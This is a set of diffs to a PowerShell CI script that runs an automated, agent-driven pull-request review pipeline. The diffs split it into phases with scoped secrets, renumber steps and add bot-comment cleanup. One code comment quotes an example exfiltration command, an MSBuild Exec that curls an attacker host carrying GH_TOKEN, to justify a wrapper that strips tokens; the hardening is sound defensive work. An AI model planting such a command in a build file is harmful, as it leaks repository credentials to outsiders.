-                if ($tail.Length -gt 3000) { $tail = $tail.Substring($tail.Length - 3000) }
-                [void]$appendMd.AppendLine("Last 30 lines of build/test stdout:")
-                [void]$appendMd.AppendLine()
-                [void]$appendMd.AppendLine('```')
-                [void]$appendMd.AppendLine($tail)
-                [void]$appendMd.AppendLine('```')
-            }
-            [void]$appendMd.AppendLine()
-            [void]$appendMd.AppendLine("</details>")
-            [void]$appendMd.AppendLine()
-        }
-    }
-
-    # Per-passed-category mini-summary: only emitted if there were ANY passed
-    # tests, so empty/skipped runs stay quiet.
-    $passedCats = @($uitestDetails | Where-Object { $_.passed_tests -and $_.passed_tests.Count -gt 0 -and $_.result -eq 'PASSED' })
-    if ($passedCats.Count -gt 0) {
-        [void]$appendMd.AppendLine("<details><summary>Show $(($passedCats | Measure-Object -Property tests_passed -Sum).Sum) passed test name(s)</summary>")
-        [void]$appendMd.AppendLine()
-        foreach ($d in $passedCats) {
-            [void]$appendMd.AppendLine("**``$($d.category)``**")
-            [void]$appendMd.AppendLine()
-            foreach ($pt in $d.passed_tests) {
-                [void]$appendMd.AppendLine("- ``$($pt.name)`` *($($pt.duration))*")
-            }
-            [void]$appendMd.AppendLine()
-        }
-        [void]$appendMd.AppendLine("</details>")
-        [void]$appendMd.AppendLine()
-    }
-    [void]$appendMd.AppendLine("_Failures here are informational only — they do not block the gate or affect try-fix candidate scoring._")
-    Add-Content $uitestContentFile $appendMd.ToString() -Encoding UTF8
-
-    # JSON summary for downstream consumers / debugging.
-    @{
-        result   = $uitestRunResult
-        platform = $uitestPlatform
-        passed   = $uitestPassed
-        failed   = $uitestFailed
-        skipped  = $uitestSkipped
-        details  = $uitestDetails
-    } | ConvertTo-Json -Depth 4 | Set-Content (Join-Path $uitestRunOutputDir "test-results.json") -Encoding UTF8
-
-    # result.txt — one-line traceability marker (PASSED / FAILED / SKIPPED).
-    $uitestRunResult | Set-Content (Join-Path $uitestRunOutputDir "result.txt") -Encoding UTF8
-}
-
-# Restore the review branch in case BuildAndRunHostApp.ps1 (or any of its
-# child invocations) detached HEAD or switched branches.
-git checkout $reviewBranch 2>$null | Out-Null
-if ($LASTEXITCODE -ne 0) {
-    Write-Host "  ⚠️ Failed to restore review branch '$reviewBranch' after Step 3 — subsequent steps may run against the wrong tree" -ForegroundColor Red
-}
-
-# ═════════════════════════════════════════════════════════════════════════════
-#  STEP 4: REGRESSION CROSS-REFERENCE (script, no copilot agent)
+#  STEP 3: REGRESSION CROSS-REFERENCE (script, no copilot agent)
 # ═════════════════════════════════════════════════════════════════════════════
 
 Write-Host ""
 Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Cyan
-Write-Host "║  STEP 4: REGRESSION CROSS-REFERENCE                      ║" -ForegroundColor Cyan
+Write-Host "║  STEP 3: REGRESSION CROSS-REFERENCE                      ║" -ForegroundColor Cyan
 Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
 
 $regressionOutputDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/regression-check"
@@ -1291,7 +847,7 @@ if (Test-Path $regressionScript) {
     Write-Host "  ⚠️ Find-RegressionRisks.ps1 not found" -ForegroundColor Yellow
 }
 
-# --- Regression Test Execution (part of STEP 4) ---
+# --- Regression Test Execution (part of STEP 3) ---
 $regressionTestResult = "SKIPPED"
 $regressionRisksJson = Join-Path $regressionOutputDir "risks.json"
 if (Test-Path $regressionRisksJson) {
@@ -1447,13 +1003,13 @@ if ($risksData -and ($risksData.result -eq 'REVERT' -or $risksData.result -eq 'O
 }
 
 # ═════════════════════════════════════════════════════════════════════════════
-#  STEP 5: Gate - Test Before and After Fix (script, no copilot agent)
+#  STEP 4: Gate - Test Before and After Fix (script, no copilot agent)
 # ═════════════════════════════════════════════════════════════════════════════
 
-# TEMP: Skip Gate (STEP 5) + Try-Fix (STEP 6) for fast iteration on the
+# TEMP: Skip Gate (STEP 4) + Try-Fix (STEP 5) for fast iteration on the
 # inline-stages architecture. Both phases are expensive (build the whole
-# repo, run agents on multiple candidates) and we just need STEPs 1-4 +
-# STEP 7 (post comment) to validate that detectedCategories /
+# repo, run agents on multiple candidates) and we just need STEPs 1-3 +
+# STEP 6 (post comment) to validate that detectedCategories /
 # aiSummaryCommentId output variables flow through to the new
 # RunDeepUITests + UpdateAISummaryComment stages. Flip $skipGateAndTryFix
 # back to $false (or delete the wrapper) once the new pipeline stages
@@ -1463,7 +1019,7 @@ if (-not $skipGateAndTryFix) {
 
 Write-Host ""
 Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Yellow
-Write-Host "║  STEP 5: GATE — TEST VERIFICATION                         ║" -ForegroundColor Yellow
+Write-Host "║  STEP 4: GATE — TEST VERIFICATION                         ║" -ForegroundColor Yellow
 Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Yellow
 
 $gateOutputDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/gate"
@@ -1790,7 +1346,7 @@ if ($Phase -eq 'CopilotReview') {
 git checkout $reviewBranch 2>$null | Out-Null
 
 # ═════════════════════════════════════════════════════════════════════════════
-#  STEP 6: PR Review (3-phase skill: Pre-Flight, Try-Fix, Report)
+#  STEP 5: PR Review (3-phase skill: Pre-Flight, Try-Fix, Report)
 # ═════════════════════════════════════════════════════════════════════════════
 
 $gateStatusForPrompt = switch ($gateResult) {
@@ -1825,8 +1381,8 @@ Run these AFTER your primary test command succeeds. If any regression test fails
     }
 }
 
-# ── STEP 6a: Try-Fix — iterative candidate generation (Copilot call 1) ────
-$step6aPrompt = @"
+# ── STEP 5a: Try-Fix — iterative candidate generation (Copilot call 1) ────
+$step5aPrompt = @"
 Generate alternative fix candidates for PR #$PRNumber using an iterative expert-review-and-test loop.
 
 ## Phase 1 — Pre-Flight (context only)
@@ -1860,14 +1416,14 @@ Do NOT re-run gate verification. The gate phase is handled separately.
 ⚠️ Do NOT create or overwrite ``gate/content.md`` — it is already generated by the gate script with detailed test output.
 "@
 
-Invoke-CopilotStep -StepName "STEP 6a: TRY-FIX" -Prompt $step6aPrompt | Out-Null
+Invoke-CopilotStep -StepName "STEP 5a: TRY-FIX" -Prompt $step5aPrompt | Out-Null
 
 # Restore review branch between copilot calls
 git checkout $reviewBranch 2>$null | Out-Null
 
-# Diagnostic: check what STEP 6a produced
+# Diagnostic: check what STEP 5a produced
 Write-Host ""
-Write-Host "  📊 STEP 6a output check:" -ForegroundColor Cyan
+Write-Host "  📊 STEP 5a output check:" -ForegroundColor Cyan
 $tryFixDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent"
 $tryFixContent = Join-Path $tryFixDir "try-fix/content.md"
 $preFlightContent = Join-Path $tryFixDir "pre-flight/content.md"
@@ -1890,9 +1446,9 @@ if ($tryFixDirs) {
     Write-Host "    ⚠️ No try-fix-N directories found" -ForegroundColor Yellow
 }
 
-# ── STEP 6b: Expert Review of PR fix + final comparison (Copilot call 2) ──
-$step6bPrompt = @"
-Run expert code review of PR #$PRNumber's fix and compare against all try-fix candidates from STEP 6a.
+# ── STEP 5b: Expert Review of PR fix + final comparison (Copilot call 2) ──
+$step5bPrompt = @"
+Run expert code review of PR #$PRNumber's fix and compare against all try-fix candidates from STEP 5a.
 
 Read context from:
 - ``CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/pre-flight/content.md``
@@ -1907,7 +1463,7 @@ Use the code-review skill with the maui-expert-reviewer agent to evaluate the PR
 Compare ALL candidates:
 - ``pr`` (the raw PR fix as submitted)
 - ``pr-plus-reviewer`` (PR fix + expert reviewer feedback applied)
-- All ``try-fix-N`` candidates from STEP 6a
+- All ``try-fix-N`` candidates from STEP 5a
 Pick the single winning candidate. **Candidates that failed regression tests MUST be ranked lower than candidates that passed them.**
 Write the comparative analysis to ``CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/report/content.md``.
 
@@ -1934,11 +1490,11 @@ $autonomousRules
 Do NOT re-run gate verification.
 "@
 
-Invoke-CopilotStep -StepName "STEP 6b: EXPERT REVIEW + COMPARE" -Prompt $step6bPrompt | Out-Null
+Invoke-CopilotStep -StepName "STEP 5b: EXPERT REVIEW + COMPARE" -Prompt $step5bPrompt | Out-Null
 
-# Diagnostic: check what STEP 6b produced
+# Diagnostic: check what STEP 5b produced
 Write-Host ""
-Write-Host "  📊 STEP 6b output check:" -ForegroundColor Cyan
+Write-Host "  📊 STEP 5b output check:" -ForegroundColor Cyan
 $expertEvalContent = Join-Path $tryFixDir "expert-pr-eval/content.md"
 $reportContent = Join-Path $tryFixDir "report/content.md"
 $winnerFile = Join-Path $tryFixDir "winner.json"
@@ -1973,8 +1529,8 @@ git checkout $reviewBranch 2>$null | Out-Null
 
 # ─── Tier 3 refresh: feed AI categories back into category detection ───
 # Step 2 ran detection without the AI tier (-AiCategories was empty).
-# Pre-flight (Step 6) wrote `ai-categories.md`; re-run detection now so the
-# unified comment reflects all three tiers before Step 7 posts.
+# Pre-flight (Step 5) wrote `ai-categories.md`; re-run detection now so the
+# unified comment reflects all three tiers before Step 6 posts.
 $aiCategoriesFile = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/uitests/ai-categories.md"
 if ($detectScript -and (Test-Path $detectScript) -and (Test-Path $aiCategoriesFile)) {
     try {
@@ -2006,29 +1562,12 @@ if ($detectScript -and (Test-Path $detectScript) -and (Test-Path $aiCategoriesFi
             $uitestOutputDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/uitests"
             $uitestContentFile = Join-Path $uitestOutputDir "content.md"
 
-            # Preserve any STEP 3 results table that was appended earlier so
-            # the post-comment phase keeps the actual run output (categories +
-            # execution table) instead of just the refreshed category list.
-            $preservedExecution = ""
-            if (Test-Path $uitestContentFile) {
-                $existing = Get-Content $uitestContentFile -Raw
-                $marker = '### 🧪 UI Test Execution Results'
-                $idx = $existing.IndexOf($marker)
-                if ($idx -ge 0) {
-                    $preservedExecution = $existing.Substring($idx)
-                }
-            }
-
             if ($refreshedCategories -eq 'NONE') {
                 "No UI test categories needed for this PR (no UI-relevant changes)." | Set-Content $uitestContentFile -Encoding UTF8
             } elseif ([string]::IsNullOrWhiteSpace($refreshedCategories)) {
                 "Full UI test matrix will run (no specific categories detected from PR changes)." | Set-Content $uitestContentFile -Encoding UTF8
             } else {
                 "**Detected UI test categories:** ``$refreshedCategories``" | Set-Content $uitestContentFile -Encoding UTF8
-            }
-
-            if (-not [string]::IsNullOrWhiteSpace($preservedExecution)) {
-                Add-Content $uitestContentFile "`n$preservedExecution" -Encoding UTF8
             }
         }
     } catch {
@@ -2100,14 +1639,14 @@ if (-not $DryRun) {
 }
 
 # ═════════════════════════════════════════════════════════════════════════════
-#  STEP 7: Post AI Summary Comment (direct script invocation)
+#  STEP 6: Post AI Summary Comment (direct script invocation)
 #  When DEFER_COMMENT_TO_STAGE3=true, skip posting here — Stage 3
 #  (UpdateAISummaryComment) will post the full comment after deep tests.
 # ═════════════════════════════════════════════════════════════════════════════
 
 Write-Host ""
 Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Magenta
-Write-Host "║  STEP 7: POST AI SUMMARY                                  ║" -ForegroundColor Magenta
+Write-Host "║  STEP 6: POST AI SUMMARY                                  ║" -ForegroundColor Magenta
 Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Magenta
 
 $summaryScriptsDir = $ScriptsDir
@@ -2138,7 +1677,7 @@ if (Test-Path $reviewScript) {
 
             # Persist comment ID + PR number to a known location and emit
             # as an output variable so the downstream UpdateAISummaryComment
-            # stage in ci-copilot.yml can rewrite the STEP 3 section once
+            # stage in ci-copilot.yml can rewrite the UI tests section once
             # the deep UI tests finish on the platform-pool agents.
             $commentIdFile = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/ai-summary-comment-id.txt"
             New-Item -ItemType Directory -Force -Path (Split-Path -Parent $commentIdFile) | Out-Null
@@ -2303,12 +1842,12 @@ $( if ($truncated) { "`n_The diff was truncated to fit GitHub's review body limi
 }
 
 # ═════════════════════════════════════════════════════════════════════════════
-#  STEP 8: Apply Labels
+#  STEP 7: Apply Labels
 # ═════════════════════════════════════════════════════════════════════════════
 
 Write-Host ""
 Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Blue
-Write-Host "║  STEP 8: APPLY LABELS                                     ║" -ForegroundColor Blue
+Write-Host "║  STEP 7: APPLY LABELS                                     ║" -ForegroundColor Blue
 Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Blue
 
 $labelHelperPath = Join-Path $ScriptsDir "shared/Update-AgentLabels.ps1"

--- a/.github/scripts/Review-PR.ps1
+++ b/.github/scripts/Review-PR.ps1
@@ -112,6 +112,11 @@ $ScriptsDir    = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'scripts
 $SkillsDir     = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'skills' }      else { Join-Path $PSScriptRoot '../skills' }
 $EngScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'eng-scripts' } else { Join-Path $PSScriptRoot '../../eng/scripts' }
 
+$commentCleanupScript = Join-Path $ScriptsDir "shared/Remove-StaleMauiBotComments.ps1"
+if (Test-Path $commentCleanupScript) {
+    . $commentCleanupScript
+}
+
 # Gate has GH_TOKEN in env so trusted code (Detect-TestsInDiff, Find-RegressionRisks,
 # detect-ui-test-categories) can fetch PR metadata via `gh` CLI. Any subprocess that
 # executes PR-controlled code (MSBuild targets, test code, source generators, host-app
@@ -307,6 +312,13 @@ if ($DryRun) {
         } else {
             Write-Host "  ⚠️ No changes to merge (PR may already be up to date)" -ForegroundColor Yellow
         }
+
+        if (Get-Command Remove-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) {
+            Remove-StaleMauiBotIssueComments `
+                -PRNumber $PRNumber `
+                -IncludeMergeConflict `
+                -Reason "resolved merge-conflict notice"
+        }
     } else {
         Write-Host "  ❌ Squash-merge had conflicts." -ForegroundColor Red
         git merge --abort 2>$null
@@ -317,8 +329,18 @@ if ($DryRun) {
         git branch -D $reviewBranch 2>$null
         git branch -D $tempBranch 2>$null
 
+        if (Get-Command Remove-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) {
+            Remove-StaleMauiBotIssueComments `
+                -PRNumber $PRNumber `
+                -IncludeMergeConflict `
+                -Reason "stale merge-conflict notice"
+        }
+
         # Post a comment on the PR about merge conflicts
-        $conflictBody = "⚠️ **Merge Conflict Detected** — This PR has merge conflicts with its target branch. Please rebase onto the target branch and resolve the conflicts."
+        $conflictBody = @"
+<!-- MAUI_BOT_MERGE_CONFLICT -->
+⚠️ **Merge Conflict Detected** — This PR has merge conflicts with its target branch. Please rebase onto the target branch and resolve the conflicts.
+"@
         try {
             gh pr comment $PRNumber --body $conflictBody 2>&1 | Out-Null
             Write-Host "  📝 Posted merge conflict comment on PR" -ForegroundColor Cyan
@@ -2165,6 +2187,19 @@ if (Test-Path $winnerFile) {
 
 $isPRWinner = (-not $winner) -or ($winner.isPRFix -eq $true)
 
+if (Get-Command Remove-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) {
+    Remove-StaleMauiBotIssueComments `
+        -PRNumber $PRNumber `
+        -IncludeTryFix `
+        -Reason "stale try-fix notice"
+}
+
+if (Get-Command Dismiss-StaleMauiBotTryFixReviews -ErrorAction SilentlyContinue) {
+    Dismiss-StaleMauiBotTryFixReviews `
+        -PRNumber $PRNumber `
+        -Reason "stale try-fix review"
+}
+
 if ($isPRWinner) {
     # Post inline review comments (file:line findings from expert-reviewer agent)
     $inlineScript = Join-Path $summaryScriptsDir "post-inline-review.ps1"
@@ -2223,6 +2258,7 @@ if ($isPRWinner) {
 
     $rationale = if ($winner.summary) { [string]$winner.summary } else { "Automated review identified a stronger candidate fix." }
     $reviewBody = @"
+<!-- MAUI_BOT_TRY_FIX -->
 🤖 **Automated review — alternative fix proposed**
 
 The expert-reviewer evaluation compared the PR fix against $($winner.winner -replace 'try-fix-','#') automatically generated candidates and selected ``$($winner.winner)`` as the strongest fix.

--- a/.github/scripts/Review-PR.ps1
+++ b/.github/scripts/Review-PR.ps1
@@ -93,7 +93,9 @@ if (-not $RepoRoot) { Write-Error "Not in a git repository"; exit 1 }
 # exactly the secrets it needs in its env: block.
 #
 # Task 1 (Setup):         env: GH_TOKEN.             No dotnet, no copilot.
-# Task 2 (Gate):          env: GH_TOKEN (read-only).  dotnet build/test + PR metadata.
+# Task 2 (Gate):          env: GH_TOKEN.  PR-code subprocesses (dotnet test,
+#                         BuildAndRunHostApp.ps1, etc.) are wrapped via
+#                         Invoke-WithoutGhTokens so they cannot exfiltrate the token.
 # Task 3 (CopilotReview): env: COPILOT_GITHUB_TOKEN. copilot → dotnet (stripped).
 # Task 4 (Post):          env: GH_TOKEN.             Trusted scripts, no dotnet.
 #
@@ -106,8 +108,33 @@ $runPost          = -not $Phase -or $Phase -eq 'Post'
 
 # Resolve the scripts directory — use TrustedScriptsDir if provided (CI),
 # otherwise use the repo's own .github/ directory (local dev).
-$ScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'scripts' } else { $PSScriptRoot }
-$SkillsDir  = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'skills' } else { Join-Path $PSScriptRoot '../skills' }
+$ScriptsDir    = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'scripts' }     else { $PSScriptRoot }
+$SkillsDir     = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'skills' }      else { Join-Path $PSScriptRoot '../skills' }
+$EngScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'eng-scripts' } else { Join-Path $PSScriptRoot '../../eng/scripts' }
+
+# Gate has GH_TOKEN in env so trusted code (Detect-TestsInDiff, Find-RegressionRisks,
+# detect-ui-test-categories) can fetch PR metadata via `gh` CLI. Any subprocess that
+# executes PR-controlled code (MSBuild targets, test code, source generators, host-app
+# builds) would otherwise inherit that token and trivially exfiltrate it via something
+# like `<Exec Command="curl attacker/?t=$(GH_TOKEN)" />` in a .csproj or
+# Directory.Build.targets. Wrap every such invocation in Invoke-WithoutGhTokens.
+function Invoke-WithoutGhTokens {
+    [CmdletBinding()]
+    param([Parameter(Mandatory)][scriptblock]$ScriptBlock)
+    $saved = @{
+        GH_TOKEN             = $env:GH_TOKEN
+        GITHUB_TOKEN         = $env:GITHUB_TOKEN
+        COPILOT_GITHUB_TOKEN = $env:COPILOT_GITHUB_TOKEN
+    }
+    try {
+        $env:GH_TOKEN             = $null
+        $env:GITHUB_TOKEN         = $null
+        $env:COPILOT_GITHUB_TOKEN = $null
+        & $ScriptBlock
+    } finally {
+        foreach ($k in $saved.Keys) { Set-Item -Path ("env:" + $k) -Value $saved[$k] }
+    }
+}
 
 # ─── Banner ───────────────────────────────────────────────────────────────────
 Write-Host ""
@@ -693,7 +720,7 @@ Write-Host "╚═════════════════════�
 
 $uitestCategories = ""
 
-$detectScript = Join-Path $RepoRoot "eng/scripts/detect-ui-test-categories.ps1"
+$detectScript = Join-Path $EngScriptsDir "detect-ui-test-categories.ps1"
 if (Test-Path $detectScript) {
     try {
         $detectOutput = & pwsh -NoProfile -File $detectScript -PrNumber "$PRNumber" 2>&1
@@ -822,11 +849,12 @@ if ($uitestCategories -eq 'NONE') {
         $testExitCode = -1
         $envErrHit = $null
         try {
-            $runResult = & $sharedRunner `
+            $runResult = Invoke-WithoutGhTokens { & $sharedRunner `
                 -Platform $uitestPlatform `
                 -Category $cat `
                 -RepoRoot $RepoRoot `
                 -LogFile $catLogPath
+            }
             if ($runResult) {
                 $testOutput   = $runResult.Output
                 $testExitCode = $runResult.ExitCode
@@ -1282,8 +1310,8 @@ if ($risksData -and ($risksData.result -eq 'REVERT' -or $risksData.result -eq 'O
         $regrTestDetails = @()
 
         $regrPlatform = if ($Platform) { $Platform } else { "android" }
-        $uiTestRunner = Join-Path $RepoRoot ".github/scripts/BuildAndRunHostApp.ps1"
-        $deviceTestRunner = Join-Path $RepoRoot ".github/skills/run-device-tests/scripts/Run-DeviceTests.ps1"
+        $uiTestRunner = Join-Path $ScriptsDir "BuildAndRunHostApp.ps1"
+        $deviceTestRunner = Join-Path $SkillsDir "run-device-tests/scripts/Run-DeviceTests.ps1"
 
         foreach ($t in $regressionTests) {
             Write-Host ""
@@ -1294,7 +1322,7 @@ if ($risksData -and ($risksData.result -eq 'REVERT' -or $risksData.result -eq 'O
                     'UITest' {
                         if (Test-Path $uiTestRunner) {
                             Write-Host "    🖥️ Running UI test via BuildAndRunHostApp.ps1 -Platform $regrPlatform -TestFilter `"$($t.Filter)`"" -ForegroundColor Cyan
-                            $testOutput = & $uiTestRunner -Platform $regrPlatform -TestFilter $t.Filter 2>&1
+                            $testOutput = Invoke-WithoutGhTokens { & $uiTestRunner -Platform $regrPlatform -TestFilter $t.Filter 2>&1 }
                             $testExitCode = $LASTEXITCODE
                             $testOutput | Select-Object -Last 20 | ForEach-Object { Write-Host "    $_" }
                         } else {
@@ -1306,7 +1334,7 @@ if ($risksData -and ($risksData.result -eq 'REVERT' -or $risksData.result -eq 'O
                         if (Test-Path $deviceTestRunner) {
                             $dtProject = if ($t.Project) { $t.Project } else { 'Controls' }
                             Write-Host "    📱 Running device test via Run-DeviceTests.ps1 -Project $dtProject -Platform $regrPlatform -TestFilter `"$($t.Filter)`"" -ForegroundColor Cyan
-                            $testOutput = & $deviceTestRunner -Project $dtProject -Platform $regrPlatform -TestFilter $t.Filter 2>&1
+                            $testOutput = Invoke-WithoutGhTokens { & $deviceTestRunner -Project $dtProject -Platform $regrPlatform -TestFilter $t.Filter 2>&1 }
                             $testExitCode = $LASTEXITCODE
                             $testOutput | Select-Object -Last 20 | ForEach-Object { Write-Host "    $_" }
                         } else {
@@ -1318,7 +1346,7 @@ if ($risksData -and ($risksData.result -eq 'REVERT' -or $risksData.result -eq 'O
                         if ($t.ProjectPath) {
                             $resolvedProj = Join-Path $RepoRoot $t.ProjectPath
                             Write-Host "    🧪 Running: dotnet test $($t.ProjectPath) --filter `"$($t.Filter)`"" -ForegroundColor Cyan
-                            $testOutput = dotnet test $resolvedProj --filter $t.Filter --logger "console;verbosity=minimal" 2>&1
+                            $testOutput = Invoke-WithoutGhTokens { dotnet test $resolvedProj --filter $t.Filter --logger "console;verbosity=minimal" 2>&1 }
                             $testExitCode = $LASTEXITCODE
                             $testOutput | Select-Object -Last 20 | ForEach-Object { Write-Host "    $_" }
                         } else {
@@ -1459,7 +1487,7 @@ for ($gateAttempt = 1; $gateAttempt -le $maxGateAttempts; $gateAttempt++) {
     # PR like a regression repro), it falls back to "verify failure only" mode
     # and reports whether the new tests fail without any fix. Passing the flag
     # would force the script to error out for those PRs.
-    $gateOutput = & pwsh -NoProfile -File "$verifyScript" -Platform $gatePlatform -PRNumber $PRNumber 2>&1
+    $gateOutput = Invoke-WithoutGhTokens { & pwsh -NoProfile -File "$verifyScript" -Platform $gatePlatform -PRNumber $PRNumber 2>&1 }
     $gateExitCode = $LASTEXITCODE
     $gateOutput | ForEach-Object { Write-Host "    $_" }
 

--- a/.github/scripts/Review-PR.ps1
+++ b/.github/scripts/Review-PR.ps1
@@ -1509,7 +1509,11 @@ for ($gateAttempt = 1; $gateAttempt -le $maxGateAttempts; $gateAttempt++) {
     # PR like a regression repro), it falls back to "verify failure only" mode
     # and reports whether the new tests fail without any fix. Passing the flag
     # would force the script to error out for those PRs.
-    $gateOutput = Invoke-WithoutGhTokens { & pwsh -NoProfile -File "$verifyScript" -Platform $gatePlatform -PRNumber $PRNumber 2>&1 }
+    # Note: NOT wrapped in Invoke-WithoutGhTokens here — verify-tests-fail.ps1
+    # itself needs GH_TOKEN to invoke Detect-TestsInDiff.ps1 (which calls `gh api`
+    # to enumerate PR files). The script wraps its OWN dotnet/host-app/device-test
+    # subprocess invocations internally to strip the token before PR code runs.
+    $gateOutput = & pwsh -NoProfile -File "$verifyScript" -Platform $gatePlatform -PRNumber $PRNumber 2>&1
     $gateExitCode = $LASTEXITCODE
     $gateOutput | ForEach-Object { Write-Host "    $_" }
 

--- a/.github/scripts/Review-PR.ps1
+++ b/.github/scripts/Review-PR.ps1
@@ -93,7 +93,7 @@ if (-not $RepoRoot) { Write-Error "Not in a git repository"; exit 1 }
 # exactly the secrets it needs in its env: block.
 #
 # Task 1 (Setup):         env: GH_TOKEN.             No dotnet, no copilot.
-# Task 2 (Gate):          env: <nothing>.            dotnet build/test only.
+# Task 2 (Gate):          env: GH_TOKEN (read-only).  dotnet build/test + PR metadata.
 # Task 3 (CopilotReview): env: COPILOT_GITHUB_TOKEN. copilot → dotnet (stripped).
 # Task 4 (Post):          env: GH_TOKEN.             Trusted scripts, no dotnet.
 #

--- a/.github/scripts/Review-PR.ps1
+++ b/.github/scripts/Review-PR.ps1
@@ -51,6 +51,13 @@ param(
     [string]$Platform,
 
     [Parameter(Mandatory = $false)]
+    [ValidateSet('Setup', 'Gate', 'CopilotReview', 'Post')]
+    [string]$Phase,
+
+    [Parameter(Mandatory = $false)]
+    [string]$TrustedScriptsDir,
+
+    [Parameter(Mandatory = $false)]
     [switch]$UseCurrentBranch,
 
     [Parameter(Mandatory = $false)]
@@ -63,6 +70,13 @@ param(
 $ErrorActionPreference = 'Stop'
 
 if ($LogFile) {
+    # When running with -Phase, each phase is a separate process writing to the same log.
+    # Append a phase suffix so phases don't overwrite each other's logs.
+    if ($Phase) {
+        $logExt = [System.IO.Path]::GetExtension($LogFile)
+        $logBase = $LogFile.Substring(0, $LogFile.Length - $logExt.Length)
+        $LogFile = "${logBase}_${Phase}${logExt}"
+    }
     $logDir = Split-Path $LogFile -Parent
     if ($logDir -and -not (Test-Path $logDir)) {
         New-Item -ItemType Directory -Path $logDir -Force | Out-Null
@@ -72,6 +86,28 @@ if ($LogFile) {
 
 $RepoRoot = git rev-parse --show-toplevel 2>$null
 if (-not $RepoRoot) { Write-Error "Not in a git repository"; exit 1 }
+
+# ─── Phase routing ─────────────────────────────────────────────────────────────
+# When -Phase is specified, run ONLY that phase. This enables the 4-task AzDO
+# split where each task calls Review-PR.ps1 with a different phase, each with
+# exactly the secrets it needs in its env: block.
+#
+# Task 1 (Setup):         env: GH_TOKEN.             No dotnet, no copilot.
+# Task 2 (Gate):          env: <nothing>.            dotnet build/test only.
+# Task 3 (CopilotReview): env: COPILOT_GITHUB_TOKEN. copilot → dotnet (stripped).
+# Task 4 (Post):          env: GH_TOKEN.             Trusted scripts, no dotnet.
+#
+# When -Phase is NOT specified, all steps run sequentially (backward compat for
+# local development use).
+$runSetup         = -not $Phase -or $Phase -eq 'Setup'
+$runGate          = -not $Phase -or $Phase -eq 'Gate'
+$runCopilotReview = -not $Phase -or $Phase -eq 'CopilotReview'
+$runPost          = -not $Phase -or $Phase -eq 'Post'
+
+# Resolve the scripts directory — use TrustedScriptsDir if provided (CI),
+# otherwise use the repo's own .github/ directory (local dev).
+$ScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'scripts' } else { $PSScriptRoot }
+$SkillsDir  = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'skills' } else { Join-Path $PSScriptRoot '../skills' }
 
 # ─── Banner ───────────────────────────────────────────────────────────────────
 Write-Host ""
@@ -87,7 +123,25 @@ if ($Platform) {
 Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
 Write-Host ""
 
+# ─── Shared variables (available to all phases) ──────────────────────────────
+$platformInstruction = if ($Platform) {
+    "**Platform for testing:** $Platform"
+} else {
+    "**Platform for testing:** Determine from PR's affected code paths and current host OS."
+}
+
+$autonomousRules = @"
+
+🚨 **AUTONOMOUS EXECUTION:**
+- There is NO human operator - NEVER stop and ask for input
+- On environment blockers: skip the blocked phase and continue
+- Always prefer CONTINUING with partial results over STOPPING
+"@
+
+$reviewBranch = "pr-review-$PRNumber"
+
 # ─── Prerequisites ────────────────────────────────────────────────────────────
+if ($runSetup) {
 Write-Host "📋 Checking prerequisites..." -ForegroundColor Yellow
 
 $ghVersion = gh --version 2>$null | Select-Object -First 1
@@ -104,21 +158,6 @@ $prInfo = gh pr view $PRNumber --json title,state 2>$null | ConvertFrom-Json
 if (-not $prInfo) { Write-Error "PR #$PRNumber not found"; exit 1 }
 Write-Host "  ✅ PR: $($prInfo.title)" -ForegroundColor Green
 
-# ─── Shared prompt rules ─────────────────────────────────────────────────────
-$platformInstruction = if ($Platform) {
-    "**Platform for testing:** $Platform"
-} else {
-    "**Platform for testing:** Determine from PR's affected code paths and current host OS."
-}
-
-$autonomousRules = @"
-
-🚨 **AUTONOMOUS EXECUTION:**
-- There is NO human operator - NEVER stop and ask for input
-- On environment blockers: skip the blocked phase and continue
-- Always prefer CONTINUING with partial results over STOPPING
-"@
-
 # ═════════════════════════════════════════════════════════════════════════════
 #  STEP 1: Branch Setup (Create Review Branch & Cherry-Pick PR)
 # ═════════════════════════════════════════════════════════════════════════════
@@ -127,8 +166,6 @@ Write-Host ""
 Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Yellow
 Write-Host "║  STEP 1: BRANCH SETUP                                     ║" -ForegroundColor Yellow
 Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Yellow
-
-$reviewBranch = "pr-review-$PRNumber"
 
 if ($DryRun) {
     if ($UseCurrentBranch) {
@@ -273,6 +310,24 @@ if ($DryRun) {
     $headCommit = git log --oneline -1 2>$null
     Write-Host "  ✅ Review branch ready: $reviewBranch" -ForegroundColor Green
